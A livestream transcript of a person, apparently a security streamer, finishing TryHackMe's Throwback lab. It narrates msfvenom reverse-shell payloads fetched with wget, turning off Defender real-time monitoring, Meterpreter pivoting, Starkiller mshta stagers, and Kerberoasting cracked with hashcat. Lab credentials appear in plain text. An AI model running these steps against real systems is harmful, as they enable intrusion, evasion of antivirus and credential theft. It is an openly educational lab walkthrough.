second Monster here. How am I going to edit this video? Am I going to edit this video? "Imagine if a client's firewall crashed when you're doing a pentest." Yeah. "Relabel stream to hangout stream, where we look at this picture of a dog doing his thing." It's an experience. "I don't think you should edit." Well, yeah, that's a fair point.
Okay. I can do nothing. I can do literally nothing. Damn, this really sucks. "Resetting all network-related stuff, so service restart." Yeah, show me all my potential, possible network services that I could be running. Oreo Bite, hey brother, how's it going? I'm doing good. However, I am struggling to... "You're tired." Yeah, it's kind of late. I don't know what time it is over where you are, but it's like 2:30 in the morning right now, at least on my side. I'm struggling to do some fun stuff with my Throwback network, and it's tough because we're like the very, very last task. Krillix, and I don't have reset perms, unfortunately. How could this happen to me? I'd like to make this a TryHackMe emergency: everyone help John with his network. You don't have to sing the whole song. No, no, no. "Add a route to the Linux routing table." So I took a look at my routes, right? So we got, what is it, netstat -rn. My tun0 interface has got a route to its own gateway to get into the rest of the network, and that's a thing that exists. I can jam with that, right? If I go to .224, which is my subnet, and then that firewall, .138, I get a good whole nothing. Yeah, that's really the only line that actually matters in that song. If I were to do a good old curl, try to reach that boy, he's also got nothing. I think my firewall has kind of crapped out. Jaximus says, "Look at Discord, bro." There's a lot of Discord going on, right. "I can toss over my connection pack for .7 and start and extend the network a couple of hours, but no guarantee I'll be awake." "Is the port open with nmap?" What? No, I cannot reach it, I don't think. It can't get there. Admittedly. "traceroute." What the hell is traceroute on Linux? Is it tracert or the full command, traceroute?
Oh god. No. I mean, I'll do it just to make you all happy. I'll run the traceroute command after I install a thousand Ruby packages for some reason. tracert. Network all the things. Network all the things. I'm kidding, I'm kidding. sudo systemctl restart networking will absolutely kill the stream. You will throw me my connection pack. Okay. I'm grateful, I suppose. Thank you. I will download this and I will use my poor man's... Is this for Throwback? Is this for your Throwback network, though? Normally it has the Throwback suffix, "-throwback." "What is your third octet?" It's on .5. Oh boy. Okay. I probably didn't need to do that on that terminal. I am now 10.50.3.2. Redo everything. 10.200.5.138, there's a firewall. Okay. Shit, this is a little disorienting, but you know what? Let's do it. So I need to get all the way back. So I need access on... "You have passwords, so SSH." Yeah, I have passwords for WS01 or PROD. I could just get to PROD. "Hey John, run this." Yeah, yeah. Did I do Remmina? So he was 10.200.5.219. That was PetersJ with Throwback317 as his password. Or is it Throwback319?
Oh god, I don't remember anything. It's like it's all falling apart now. Now I need to do a quick recap. Throwback317, pretty sure that's it. But it was PetersJ. No, that's not a command you should run. So, cmd. We don't need anything other than this proxy. So let's hop over to my Meterpreter section and start up an HTTP server: python -m http.server. So my new IP address, as I reconnect to literally everything, is this guy. So let's start msfconsole in one pane. I'll switch that to be the regular prompt, and I'll make this my msfconsole black, there we go. And we need to get over to this guy, and we need to run PowerShell. Let's make this a little bit bigger so you guys can see it. I realize this text is very, very tiny, and that's no good on your eyes. So let's make this 10.50.3.2:8000/notashell.exe and bring that to met.exe. I need to recreate this whole stinking thing. Oh boy. Yep. Yep. msfvenom. We need to create a new one. msfvenom, meterpreter/reverse_tcp, LHOST equals my tun0, LPORT... So I don't forget, at least: I am not currently using tmux, for those that are asking. Let's make that an executable and let's redirect it to new.exe. Thanks. It's going to take me a little bit, and I feel really, really bummed you guys had to deal with all that nonsense, but you know what? We'll work with it. So let's use multi/handler. Let's set LHOST to tun0. Let's set this payload to windows/meterpreter/reverse_tcp. Set LPORT 4141, and just let that bad boy go. So now let's start this server yet again. Let's get back over here, and just to verify my execution policy... I can do what I want, great. And I'm using Terminator to split my screen. Let's Set-MpPreference. I'm probably not the admin, but let's make ourselves the admin. So let's go ahead and runas... or what is it? It was /savecred and /user:... Admin's admin. PetersJ, /profile cmd.exe. What was his password again?
He didn't... We didn't have a PetersJ. PetersJ, there we go, okay. Properties. Now let's do some PowerShell and cd into C:\Windows... PetersJ, get back to our normal spot. Sorry, cd C:\Users\PetersJ. Now let's Set-MpPreference to turn off real-time auditing, just in case it is: -DisableRealtimeMonitoring, set that to $true. And now let's wget http://10.50.3.2:8000/new.exe -o met.exe. It should download it. We do have met.exe. Let's run that, .\met.exe. Before I do, I want to make sure that that shell is running, and it is. Great. So now I can .\met.exe and I should get a Meterpreter session running. Fantastic. Okay, now let's go to the background and use autoroute. Okay, let's set SESSION 1 and set SUBNET to 10.200.5.0/24 and then run that. Let's also search for that socks4a. Sorry, you're probably giving me things to do and I'm just blaring along. I don't mean to be not following through. Now let's get on the domain controller. So xfreerdp /u:MercerH /p:Throwback2020 /v:10.200.5.117. Sorry, it's /u. Yep, I totally trust that. Uh, was I wrong in that regard? Gosh, I feel like I'm trying to remember everything. Oh yeah, I did get his password.
I'm sorry, I totally had that. PikaPika... thank you. Goodness, I am falling apart. Pikachu7. There we go. I don't know if I really want to open that one, I'll be honest. It doesn't matter, but the GUI might just make me trip on stupid things, so I don't want to. I have no idea why you guys are sticking with me. We're just retracing our steps. Frustrated John. Well, I definitely have this command ingrained into my head now, so that's a plus. I now know how to turn off real-time monitoring all the time on a Windows 10 machine. So where's met.exe? Oh shoot. Shoot. You're totally right, I'm sorry, I just saw your chat that I got that wrong, as Windows Defender was like, "Nope, no more Meterpreter." Thank you. I literally say that as I was saying, "Oh yeah, I totally know how to run this command," and clearly I fudged that up too. Where's met? I just downloaded you. Okay. Great. background. Now let's use autoroute once again. Before I go through all this, I'm sorry, I should be checking out that breachgtfo.local. And this should... Oh, I need to update my /etc/hosts now. So much to change. And my DC connection died. What the heck? So this is now .5 and .5. breachgtfo.local, should that still come back? I feel like that should come back at this point. HTTP. Why are you redirecting me? Stop redirecting me. We're going to stinking Chrome on this: gtfo.local. There we go. Okay, Stewart@tbhsecurity.com. Give me that. Please have a flag here. There we go. Oh my gosh. Go all the way back and submit that. Okay, okay, okay, okay. We're almost done. We're on our... not our second wind, but like our seventh wind right now. So let's keep cruising. And the Meterpreter had died on our DC. So let's get that back. What's happening? Is that why we migrated, like, immediately? It's still killing my met.exe. So I probably need to run that... use multi/handler, run. Go, go, go. Okay, migrate, tab in, winlogon.exe. It's a race. Windows Defender can't stop us now. We did it. We're safe for now. Now let us background and use autoroute once again. autoroute. Dude,
autoroute? Yeah, I'd buy that. show options. Set CMD to delete. Run. Set CMD to autoadd, and set CMD... sorry, set SESSION to 3, which is the current one. Excuse me, why did that not work? "Windows Defender kills winlogon.exe." I'm sorry, that made me laugh harder than it should have. That's awesome. Print. Run. Session 1, why are you still doing that thing? Set CMD to delete. Set SESSION 1. Delete. Oh god, the stupid... set SUBNET. Crap, again: 10.200.5.0. Now do it. Set CMD print. And now it's gone. Set CMD to autoadd, and then set SESSION to 3, which should still be alive. Great. Now let's do yet another xfreerdp. There's a lot of stuff going on, dudes. proxychains, which we can still go through, xfreerdp /u:MercerH /p:PikaPikaPikachu7 10.200.5.118 to get me to CORP. Now we got new creds. Oh yeah, we can just go straight to that. We don't need to bother. Well, corp80t. Is that... or this is for the mail server, is it not? What's this mail? Maybe I'm confused. "You may not have access to your account while getting a few days. In the meantime, you're able to use the guest account. You can access the account with the following credentials. This guest account will be heavily monitored, and it'll be activated as soon as your account is up and running." Which, what is that new server that I'm just missing? Is that on our domain that I'm just not parsing? It's on the map. It's on the map. Door of the explorer. It's on the map. TBSEC-DC01, and we know that is .79. Okay. So we still needed to pivot and to get into CORP-DC01. So I think I still need my proxychains through DC01. I don't think I'm crazy in setting that up, am I?
Oh god. xfreerdp. This guy. I feel like I still need to get a shell on this, or a proper proxy through this. This is like a race to reach the end. I'm 10.50.3.2:8000/new.exe. I need to actually put that somewhere. Let me cd to C:\Users\MercerJ... MercerH, sorry. And now run that wget command and make a Meterpreter. Good. Okay, use multi/handler, run, .\met.exe. Hello? It was a typo, please don't die. Thank you. met.exe. New session. Let's migrate ASAP again, just in case this thing dies: winlogon.exe. winlogon is always 708, man. Great. Now he is safe momentarily. Let's use autoroute yet again. Set CMD to delete. Did it screw up my subnet? No, it didn't. Okay. So run. Set CMD to print. Run. No routes. Set CMD... what sessions do I have? Session 4 is the current one, all the way through CORP. So set SESSION to 4, set CMD to autoadd, and go. Okay, incredible. Now I should be able to go reach .79. I have credentials on a guest account, correct. And is that going to be a webmail server? It said here you can use the guest account. Let me do a quick nmap scan on that. Really cool, because I don't exactly know what that box is. nmap -v 10.200.5.79. And is that something that I can literally RDP into, though? proxychains xfreerdp. I'll just do it again, I'll just try it. tbsec guest and welcome tbsec. Should be 10.200.5, now .79. And ask for a certificate. Will it work? Yeah, all right. Okay. We're doing it again, all over again. We got this little flag here for user. Just slap that in for user. That's number 25, right? What happened to 24?
24 I just didn't write down. It's a little bit bigger so you can see it, sorry. And now we need to get root on that thing. So we should get Rubeus and Starkiller all set up again. Let me see if I can remind myself how to actually do that. I want to get a regular shell on this. I don't think I can, though, because I probably won't be able to disable Defender, because I don't have privilege escalation yet. So I think I've just got to go for getting Rubeus back on, Starkiller back on there, but I need to get an agent on there. "After retrieving credentials from the mail server, we gain access to TBSEC's domain controller." Oh no, yeah, I didn't even try. So I guess I can try. It's worth the try. I might... Oh no, this is a guest account, so that might be really weird. It's a thing. Let's get back to my server. use multi/handler, run, ASAP, in case it kills met. AV. Did I say run? Did I run that? Great. We could do some other privesc stuff, maybe, if we wanted to. Let me migrate on that ASAP, just in case. Can I just getsystem? Quick win? Nah. Fine. Let's do the Empire at this point. "To use Rubeus to automate Kerberoasting, we can either compile and transfer a binary onto the target machine; however, this will get picked up by AV. Or you can use a C2 tool to load Rubeus and execute commands in the C2 agent. So we'll need to generate a stager in Starkiller, transfer it to the domain controller, and get a Starkiller agent on the domain controller." All right. Time to remember all of the Empire and Starkiller things that I was doing. There are a lot of shells, all of which are seemingly being used currently. I should no longer use this shell if I'm depending on him to do all of these other xfreerdp things. This will now be my dead shell. Let's go into /opt and Empire, and I think we needed to sudo empire --rest. Is that right?
Yeah. We need to get into Starkiller: sudo starkiller --no-sandbox. This kind of feels good, honestly. This feels like I have learned something, and I feel like I'm working through here. So I need to create a new stager, right? So I can do that. Um. "You know, Metasploit does have Kerberos." Does it? So you're gonna end up teaching me a thing or two here. search kerberos. Oh. Can I use that? Or load mimikatz? Oh, that's true. I was too stuck in my ways. load mimikatz. I could, like, load kiwi now, but will it be able to, like, get stuff? I'm confused. Jaximus is... I'm gonna wait for you to throw something at me, and I'm gonna keep cruising on Starkiller, if that's totally cool, while you enlighten me, because that's gonna be new for my mind. I'm just trying to get a Starkiller because I hate it... Well, let's create a new stager. Let's do some HTA stuff, do we think? Is that how that should work? I need a listener. I need to be myself, 10.50.3.2. Do I need a port or something to, like, listen on?
999? No. Oh, I need a listener. I now understand. HTTP, quad 6 is fine, and I am now running on 10.50.3.2, so we'll use quad 6. Okay. So if I create a new stager with mshta, would I just be able to, like, do it? Like, do I just run mshta and then, like, the thing? I'll put "copied to clipboard." What did that actually do? So I have this mshta thing, and I could host that with mshta or, like, agent.hta. I guess I'll call that that, and maybe that will get an agent callback, hopefully. That one's hosting, that HTTP server is hosting. So over on .5.79 I should be able to mshta http://10.50.3.2:8000/agent.hta. I forgot a space. It ran it. It triggered. It got it successfully. Oh, sorry. You can see that there in the logs. And over in Starkiller, if I bump around, do I have a new agent at all? I'm bad at this. I did a PowerShell one previously. What happened to the other listener? That's not right. That host is wrong. Can I edit this? I cannot seem to edit this. What? What? Kill that thing. We're a new listener on HTTP, and that's what it should be. It should be http1, I guess it's now just giving it a new name. And there's stagers, and that goes to http. That would have been an old one, so maybe that's not right. Let's make a new one. Let's use the batch launcher, and let's use that http1. Let's just see that that will behave, because now http1 is going to be at the right host and the right port, and I have this windows/launcher_bat. Let's put it in that Meterpreter directory and let's just take a look at it real quick. So can I run that? I'm glad you have faith, dude. You know me, I don't. Let's put that in launcher.bat, and let's put launcher.bat in here. So we should see in the background... Let's make this request, which we do, and we have launcher.bat, and I can .\launcher.bat, and it should close the window when it properly starts the agent. And I have a new agent. All right. Thanks, Jaximus, I appreciate you extending the lab for me. All right, we got an agent. All right. So now we can run some modules. Rubeus, go. And that will take some time, from
what I remember in the last stuff. Oh, it needed a command. Shoot. Okay, it just didn't have a thing to do. My bad. Module name: Rubeus. Rubeus. Command: kerberoast. Right. And just let it go. Okay, because it's an HTTP C2 cycle, it takes five seconds getting back to me. Rough. I saw some output, though. Let's see what we got here. Run Rubeus. Got a new hash. Is that literally it? Do I literally need to crack this hash again? Are you serious? Are we gonna be doing more, more Colabcat? Pass the hash. Can I do pass the hash? I feel like I need to crack this. Yep. Back to my old Colabcat. "What vulnerable service... what vulnerable account?" TB service. "What password can be cracked?" Let's get back at our friend Colabcat. But first, let's clean this stinking hash. Remove all those newlines. Make this thing behave. Alrighty. TB service. Final hash. This stream has been brought to you in part by Colabcat. That's a good joke. Sponsor, just kidding. Colabcat, bring me back. This is all shout-out and thanks to Colab, or to Jaximus coming in clutch, offering his connection pack. Oh yeah, too much line is texted. Funny. Here we go. Let's use the OneRuleToRuleThemAll utility. So, while we're waiting, we can go ahead and stage this command. We're gonna end up using hashcat, and I think this is like 381... I think this is one of the three hash types. It is $krb5tgs$... that guy, so let's go back to that and let's search for him. Yeah, it's 13100. Okay. So it's this thing. We need to cd into /drive/MyDrive/.hashcat, and then we need to echo this big long thing into hash.txt. So specify that mode. We'll use -a 0, because people tell me that I should, and we'll use OneRuleToRuleThemAll.rule, and hash.txt with rockyou.txt. So how is hashcat doing? He's still compiling over there, but I think we are pretty well staged. We just got to let this boy go. Waiting for my sed command to tell me that we're done. Hmm. Boy oh boy. We're almost at the end. I feel like we're basically at the end.
It's been fun. Hey, thanks, Jaximus, you're the man. Thank you so, so much for helping out. This has been a really awesome learning experience for me, so I'm really grateful for all this learning. hashcat now works, so let's start to slap some of these commands in. "Can I get a quick synopsis of Colabcat?" It's just crowdsourced cracking. It is Google Colab, and they're kind of online-sourced for being able to run commands and use some resources, and it's set up with hashcat, or you can set it up with hashcat, staged to run with hashcat, so it actually is fast for cracking hashes. "Why not just run it locally?" So I'm streaming right now, right, and it kind of really, really slows down the stream, and it might take forever for it to crack on my GPU. Not forever, right, it would just be like 10 hours or 8 hours. My GPU would be like, "I'm trying to help." But I wonder if we actually need the OneRuleToRuleThemAll right now, or I wonder if we're just making it worse, because this is taking longer than it usually does. Normally Colabcat's, like, done. Can I run, like, a separate hashcat session that's not running with the rules? "What password could be cracked from the Kerberos ticket?" Yeah, I was going to say, only one at a time, there's no way that I could run another. That looks like a long password, though. Like, this looks like something that would have rules in it, or would need rules in it. Am I wrong in that? I will forever go to Colabcat, though, now that I, like, know and understand this thing. "Maybe filter the wordlist by max characters before cracking." That's an option. Part of me wonders how long it'll take this thing to run through everything that it has. Oh, I guess it's 0.19% done, so that probably doesn't help. Let's quit this one and try without rules, just to see. Yeah, I was going to say, how are the rules... Just let them go. And that's a very good thing that we did that, because it is immediately cracked. What do we got? What's our password here? "Security admin," that thing. Oh boy. Final hash crack.
That is the user TB secret... So what can I do at this point? How am I realistically supposed to do that? RDP, SSH, any of them? Can I do a runas? Yeah. Yeah, I did it. We did it. We are in. net user. Are we an admin? Yeah. Yeah. I need a sig and run type. Keeping it real all the way till the end. Wow. Holy cow. What a journey. Quick draw on the flag submission real quick. Full screen for the full effect. Hit the submit button. Go down to "game over." Be done with it. Oh my goodness. Wow. What a journey. Congratulations, everybody. Thank you. You guys are the ones that helped me through this thing. I hope you learned more than I did. We spent what, 12 hours, 14, 15 hours on this? So much time. Let's check out that certificate. "Firefox prevented this site from opening a pop-up," because that's malware. Open that thing. Wow. Thanks so much, everybody. Jaximus, kudos and credit to you. You've been incredible. Special shout-out and thank you to Krillix for one thing: making this gosh darn thing. Same thing with Darkstar, same thing with Ashley, same thing with Ben, same thing with Spooky Dark. Everyone has been incredible and fantastic for putting this together. I learned a ton, at least I feel like I learned a ton. I hope I retain a lot of it. CME, CrackMapExec, Starkiller, Empire, Kerberoasting, secretsdump, Impacket, BloodHound. There's so much that we've worked through for this, and we finally made it to the end. Wow. I don't know how to end this stream now. You know, we've accomplished so much. Yeah, that felt like we really had a lot going on. I am really, really grateful for the hand-holding, and I don't want to say hand-holding, right, because it's not what it was. I still felt like I was doing it. I appreciate all the background and all the information that this was willing to offer to kind of help me, I don't know, get up to speed. I appreciate it showcasing and explaining some of the offensive PowerShell, some of all the stuff. We got a really great learning value with setting Windows Defender real-time monitoring and turning that off. That
was kind of cool. And finally, your boy on Twitter, Jaximus, is throwing his Twitter account out here. Here we go, here we go. Follow Jaximus. This is a really sketchy-looking Twitter page, dude. I'm kidding, I'm kidding. This is fantastic, thank you so much. Thank you, everyone, for tuning in. Thanks to everyone watching, and thanks for having a great time with me. I really hope that this helped you look behind the curtain as to what Throwback is, what the TryHackMe network showcases, and helps you learn, because this was all a lot of new stuff for me. These were things that I haven't explored before, and that was probably pretty evident in everything that we worked through. But this has been an absolute blast, so I can't say it enough: thanks so much. Now we need to end this stream, and we need to go to bed, because it's three in the morning. So thank you, everybody. I'm gonna hop over to OBS and call it tonight. What should we do next? What should we do next? What else are we gonna stream? I don't know, let me know. Thanks, all. Take care, everybody, have a good night. I love you, I'll see you later.